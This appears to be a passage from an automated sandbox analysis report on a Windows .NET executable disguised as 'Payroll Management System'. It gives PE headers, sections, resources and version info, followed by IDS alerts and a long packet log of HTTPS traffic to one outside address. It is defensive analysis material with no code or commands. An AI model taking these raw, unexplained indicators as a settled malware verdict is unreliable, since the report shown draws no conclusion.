                                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                            Time Stamp:0x6177E630 [Tue Oct 26 11:27:44 2021 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:v4.0.30319
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                            Authenticode Signature

                                                                                            Signature Valid:
                                                                                            Signature Issuer:
                                                                                            Signature Validation Error:
                                                                                            Error Number:
                                                                                            Not Before, Not After
                                                                                              Subject Chain
                                                                                                Version:
                                                                                                Thumbprint MD5:
                                                                                                Thumbprint SHA-1:
                                                                                                Thumbprint SHA-256:
                                                                                                Serial:

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2db040x57.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e0000x35b7c.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x2c8000x13b8
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000x2bb640x2bc00False0.342918526786data5.35443178947IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0x2e0000x35b7c0x35c00False0.447647165698data5.9332968012IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0x640000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                RT_ICON0x2e2b00x468GLS_BINARY_LSB_FIRST
                                                                                                RT_ICON0x2e7180x988data
                                                                                                RT_ICON0x2f0a00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4292932603, next used block 4292932603
                                                                                                RT_ICON0x301480x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294704381, next used block 4294835709
                                                                                                RT_ICON0x326f00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4294835709, next used block 4294901502
                                                                                                RT_ICON0x369180x5488data
                                                                                                RT_ICON0x3bda00x94a8data
                                                                                                RT_ICON0x452480x10828dBase III DBT, version number 0, next free block index 40
                                                                                                RT_ICON0x55a700xdafePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                RT_GROUP_ICON0x635700x84data
                                                                                                RT_VERSION0x635f40x39cdata
                                                                                                RT_MANIFEST0x639900x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                Imports

                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain

                                                                                                Version Infos

                                                                                                DescriptionData
                                                                                                Translation0x0000 0x04b0
                                                                                                LegalCopyrightCopyright 2013
                                                                                                Assembly Version1.0.0.0
                                                                                                InternalNamePayroll Management System.exe
                                                                                                FileVersion1.0.0.0
                                                                                                CompanyName
                                                                                                LegalTrademarks
                                                                                                Comments
                                                                                                ProductNamePayroll Management System
                                                                                                ProductVersion1.0.0.0
                                                                                                FileDescriptionPayroll Management System
                                                                                                OriginalFilenamePayroll Management System.exe

                                                                                                Network Behavior

                                                                                                Snort IDS Alerts

                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                10/26/21-17:35:17.583018UDP254DNS SPOOF query response with TTL of 1 min. and no authority53652968.8.8.8192.168.2.5
                                                                                                10/26/21-17:35:44.650440UDP254DNS SPOOF query response with TTL of 1 min. and no authority53551618.8.8.8192.168.2.5
                                                                                                10/26/21-17:36:00.858899UDP254DNS SPOOF query response with TTL of 1 min. and no authority53499928.8.8.8192.168.2.5
                                                                                                10/26/21-17:36:18.125803UDP254DNS SPOOF query response with TTL of 1 min. and no authority53550168.8.8.8192.168.2.5
                                                                                                10/26/21-17:36:53.840279UDP254DNS SPOOF query response with TTL of 1 min. and no authority53504638.8.8.8192.168.2.5

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 26, 2021 17:34:18.412703037 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:18.412739992 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:18.412915945 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:18.482494116 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:18.482516050 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:18.539009094 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:18.539141893 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:18.545500994 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:18.545520067 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:18.546964884 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:18.648761034 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.176397085 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.219146013 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.229686022 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.230118036 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.230128050 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.230248928 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.230283022 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.230305910 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.230331898 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.230385065 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.230406046 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.230422020 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.230426073 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.230437994 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.230443001 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.230447054 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.230454922 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.230458021 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.230508089 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.230845928 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.237411022 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.237413883 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.237436056 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.237530947 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.246047020 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.246627092 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.246695042 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.246975899 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.248476982 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.248507023 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.250466108 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.250483990 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.250494957 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.250498056 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.250499964 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.250502110 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.250612974 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.254712105 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.254937887 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.255001068 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.255145073 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.255278111 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.255295992 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.255321980 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.259504080 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.259526968 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.259542942 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.259581089 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.261250973 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.262701035 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.263195992 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.263221979 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.264626980 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.264638901 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.264641047 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.268368006 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.268399000 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.271261930 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.272505999 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.275636911 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.275670052 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.275737047 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.278683901 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.278963089 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.279016972 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.279067039 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.279155016 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.279261112 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.280850887 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.280874014 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.280886889 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.280922890 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.280946970 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.280985117 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.280985117 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.281064034 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.283531904 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.283540964 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.283543110 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.283548117 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.283628941 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.285322905 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.285348892 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.285363913 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.285480976 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.292190075 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.292758942 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.292825937 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.292871952 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.293539047 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.298321962 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.303459883 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.303477049 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.303503990 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.303520918 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.303541899 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.303565025 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.303632975 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.303647041 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.303675890 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.306128979 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.306159019 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.306178093 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.306185007 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.306221008 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.306251049 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.306257963 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.306269884 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.306363106 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.306371927 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.306444883 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.309953928 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.310012102 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.310133934 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.310179949 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.310349941 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.315920115 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.315944910 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.315963030 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.315979004 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.315987110 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.315999031 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.316004992 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.317583084 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.317609072 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.317624092 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.317631006 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.317687035 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.319170952 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.321383953 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.321649075 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.322602987 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.322608948 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.322628975 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.322634935 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.322653055 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.324472904 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.326234102 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.326252937 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.326746941 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.326770067 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.326786995 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.326792955 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.326811075 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.326894045 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.326900959 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.326910019 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.327111006 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.327140093 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.327174902 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.339409113 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.339432001 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.339442968 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.339447975 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.339452028 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.339454889 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.339606047 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.344701052 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.345918894 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.346064091 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.349550009 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.349560976 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.349771023 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.350523949 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.350545883 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.350742102 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.350750923 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.351968050 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.351993084 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.356302977 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.356308937 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.356358051 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.358468056 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.358501911 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.379003048 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.383434057 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.383447886 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.383450985 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.386496067 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.386512041 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.387419939 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.388046980 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.388062954 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.388078928 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.388084888 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.390434027 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.390568972 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.390578032 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.390779018 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.393969059 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.397439957 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.397464037 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.397468090 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.398399115 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.404805899 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.414518118 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.414520025 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.414654970 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.414902925 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.414916992 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.414931059 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.414941072 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.422662020 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.422689915 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.422703981 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.422883034 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.422888994 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.422977924 CEST49745443192.168.2.5162.159.130.233
                                                                                                Oct 26, 2021 17:34:19.422983885 CEST44349745162.159.130.233192.168.2.5
                                                                                                Oct 26, 2021 17:34:19.423074007 CEST49745443192.168.2.5162.159.130.233
